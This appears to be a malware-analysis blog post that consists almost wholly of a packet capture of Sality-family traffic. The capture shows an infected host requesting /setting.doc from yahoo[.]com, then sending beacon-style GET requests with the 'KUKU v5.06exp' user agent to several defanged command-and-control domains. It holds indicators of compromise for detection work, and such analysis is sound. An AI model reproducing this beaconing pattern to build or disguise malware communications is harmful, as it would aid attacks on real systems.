Another Sality Family Malware Traffic Example – Using Yahoo Document as TTP Vector

June 19, 2015

2013-02-03 18:20:55.267923 IP 172.16.253.129.53 > 8.8.8.8.53: 39453+ A? yahoo[.]com. (27)
2013-02-03 18:20:55.267969 IP 172.16.253.129.53 > 4.2.2.2.53: 39453+ A? yahoo[.]com. (27)
2013-02-03 18:20:55.294540 IP 4.2.2.2.53 > 172.16.253.129.53: 39453 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
2013-02-03 18:20:55.294559 IP 8.8.8.8.53 > 172.16.253.129.53: 39453 3/0/0 A 206.190.36.45, A 98.138.253.109, A 98.139.183.24 (75)
2013-02-03 18:20:55.331487 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [S], seq 1729162271, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2013-02-03 18:20:55.378176 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [S.], seq 2454102501, ack 1729162272, win 64240, options [mss 1460], length 0
2013-02-03 18:20:55.378231 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [.], ack 1, win 64240, length 0
2013-02-03 18:20:55.378401 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [P.], seq 1:72, ack 1, win 64240, length 71
GET /setting.doc HTTP/1.1
Host: yahoo[.]com
Cache-Control: no-cache
2013-02-03 18:20:55.378531 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [.], ack 72, win 64240, length 0
2013-02-03 18:20:55.434887 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [P.], seq 1:1461, ack 72, win 64240, length 1460
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2013 16:00:28 GMT
P3P: policyref="http://info.yahoo[.]com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Last-Modified: Fri, 04 Jan 2013 11:09:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Via: HTTP/1.1 ir13.fp.bf1.yahoo[.]com (YahooTrafficServer/1.20.13 [c sSf ])
Server: YTS/1.20.13

992
<html>
<head>
<meta http-equiv="refresh" content="10;url=/">
<title>Yahoo!</title>
</head>

<body>
<center>
<table width=650 cellpadding=0 cellspacing=2 border=0>
<tr>
<td width=1% valign=top><a href="/404/*http://www.yahoo[.]com"><img src=http://us.i1.yimg[.]com/us.yimg[.]com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo"></a></td>
<td align=right><font face=arial size=-1><a href="/404/*http://www.yahoo[.]com">Yahoo!</a> - <a href="/404/*http://help.yahoo[.]com">Help</a></font><hr size=1 noshade></td>
</tr>
</table>
<br><br>
<table width=500 cellpadding=7 cellspacing=0 border=0>
<tr><td align=center><font face=arial size=+1><b>Sorry, the page you requested was not found.</b></font></td></tr>
<tr><td><font face=arial size=-1>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the
2013-02-03 18:20:55.436555 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [P.], seq 1461:2921, ack 72, win 64240, length 1460
<b><a href="/404/*http://www.yahoo[.]com">Yahoo! home page</a></b> or look through a list of <b><a href="/404/*http://docs.yahoo[.]com/docs/family/more.html">Yahoo!'s online services</a></b>. Also, you may find what you're looking for if you try searching below.</font>
2013-02-03 18:20:56.494474 IP 172.16.253.129.1044 > 98.139.183.24.80: Flags [P.], seq 72:143, ack 3046, win 64115, length 71
GET /setting.doc HTTP/1.1
Host: yahoo[.]com
Cache-Control: no-cache
2013-02-03 18:20:56.494757 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [.], ack 143, win 64240, length 0
2013-02-03 18:20:56.542535 IP 98.139.183.24.80 > 172.16.253.129.1044: Flags [P.], seq 3046:4506, ack 143, win 64240, length 1460
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2013 16:00:30 GMT
P3P: policyref="http://info.yahoo[.]com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Last-Modified: Fri, 04 Jan 2013 11:09:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Via: HTTP/1.1 ir13.fp.bf1.yahoo[.]com (YahooTrafficServer/1.20.13 [c sSf ])
Server: YTS/1.20.13
2013-02-03 18:20:56.677007 IP 172.16.253.129.1046 > 98.139.180.149.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75
GET /setting.doc HTTP/1.1
Host: www.yahoo[.]com
Cache-Control: no-cache
2013-02-03 18:20:56.677202 IP 98.139.180.149.80 > 172.16.253.129.1046: Flags [.], ack 76, win 64240, length 0
2013-02-03 18:20:56.721713 IP 98.139.180.149.80 > 172.16.253.129.1046: Flags [P.], seq 1:447, ack 76, win 64240, length 446
HTTP/1.1 404 Not Found
Date: Sat, 17 Aug 2013 16:00:30 GMT
Connection: close
Via: HTTP/1.1 ir2.fp.bf1.yahoo[.]com (YahooTrafficServer/1.20.13 [c s f ])
Server: YTS/1.20.13
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 176

<HEAD><TITLE>Not Found</TITLE></HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<FONT FACE="Helvetica,Arial"><B>
</B></FONT>

<!-- default "Not Found" response (404) -->
</BODY>
2013-02-03 18:24:12.283577 IP 172.16.253.129.1050 > 62.116.143.18.80: Flags [P.], seq 1:134, ack 1, win 64240, length 133
GET /images/logos.gif?114bbc=9068000 HTTP/1.1
User-Agent: KUKU v5.06exp =9355466431
Host: hayatspa[.]com
Cache-Control: no-cache
2013-02-03 18:24:12.288962 IP 62.116.143.18.80 > 172.16.253.129.1050: Flags [.], ack 134, win 64240, length 0
2013-02-03 18:24:12.363373 IP 4.2.2.2.53 > 172.16.253.129.53: 45965 1/0/0 A 62.116.143.18 (46)
2013-02-03 18:24:12.393386 IP 62.116.143.18.80 > 172.16.253.129.1050: Flags [P.], seq 1:357, ack 134, win 64240, length 356
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 17 Aug 2013 16:03:45 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding

2013-02-03 18:24:13.133744 IP 8.8.8.8.53 > 172.16.253.129.53: 42671 1/0/0 A 208.73.210.210 (46)
2013-02-03 18:24:13.135325 IP 172.16.253.129.1053 > 208.73.210.210.80: Flags [S], seq 1077896090, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2013-02-03 18:24:13.223789 IP 208.73.210.210.80 > 172.16.253.129.1053: Flags [S.], seq 2798705715, ack 1077896091, win 64240, options [mss 1460], length 0
2013-02-03 18:24:13.223826 IP 172.16.253.129.1053 > 208.73.210.210.80: Flags [.], ack 1, win 64240, length 0
2013-02-03 18:24:13.223961 IP 172.16.253.129.1053 > 208.73.210.210.80: Flags [P.], seq 1:127, ack 1, win 64240, length 126
GET /logos.gif?114f65=2268874 HTTP/1.1
User-Agent: KUKU v5.06exp =9355466431
Host: elaswany[.]com
Cache-Control: no-cache
2013-02-03 18:24:13.224147 IP 208.73.210.210.80 > 172.16.253.129.1053: Flags [.], ack 127, win 64240, length 0
2013-02-03 18:24:13.303831 IP 4.2.2.2.53 > 172.16.253.129.53: 42671 1/0/0 A 208.73.210.210 (46)
2013-02-03 18:24:13.303848 IP 208.73.210.210.80 > 172.16.253.129.1053: Flags [R.], seq 1, ack 127, win 64240, length 0
2013-02-03 18:24:13.316911 IP 172.16.253.129.53 > 8.8.8.8.53: 25001+ A? www.ta7ka[.]com. (31)
2013-02-03 18:24:13.316983 IP 172.16.253.129.53 > 4.2.2.2.53: 25001+ A? www.ta7ka[.]com. (31)
2013-02-03 18:24:13.343859 IP 8.8.8.8.53 > 172.16.253.129.53: 25001 NXDomain 0/1/0 (104)
2013-02-03 18:24:13.344113 IP 172.16.253.129.53 > 8.8.8.8.53: 17227+ A? www.ta7ka[.]com.localdomain. (43)
2013-02-03 18:24:13.344182 IP 172.16.253.129.53 > 4.2.2.2.53: 17227+ A? www.ta7ka[.]com.localdomain. (43)
2013-02-03 18:24:14.004305 IP 172.16.253.129.1054 > 195.22.26.231.80: Flags [P.], seq 1:153, ack 1, win 64240, length 152
GET /images/mainfp.gif?1151c6=11350460 HTTP/1.1
User-Agent: KUKU v5.06exp =9355466431
Host: www.ald-transports-express[.]eu
Cache-Control: no-cache
2013-02-03 18:24:14.011518 IP 195.22.26.231.80 > 172.16.253.129.1054: Flags [.], ack 153, win 64240, length 0
2013-02-03 18:24:14.124189 IP 195.22.26.231.80 > 172.16.253.129.1054: Flags [P.], seq 1:278, ack 153, win 64240, length 277
HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Sat, 17 Aug 2013 16:03:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=627522f854555e40aa2c612ac354e32d|68.48.54.191|1376755427|1376755427|0|1|0
Set-Cookie: snkz=68.48.54.191

0
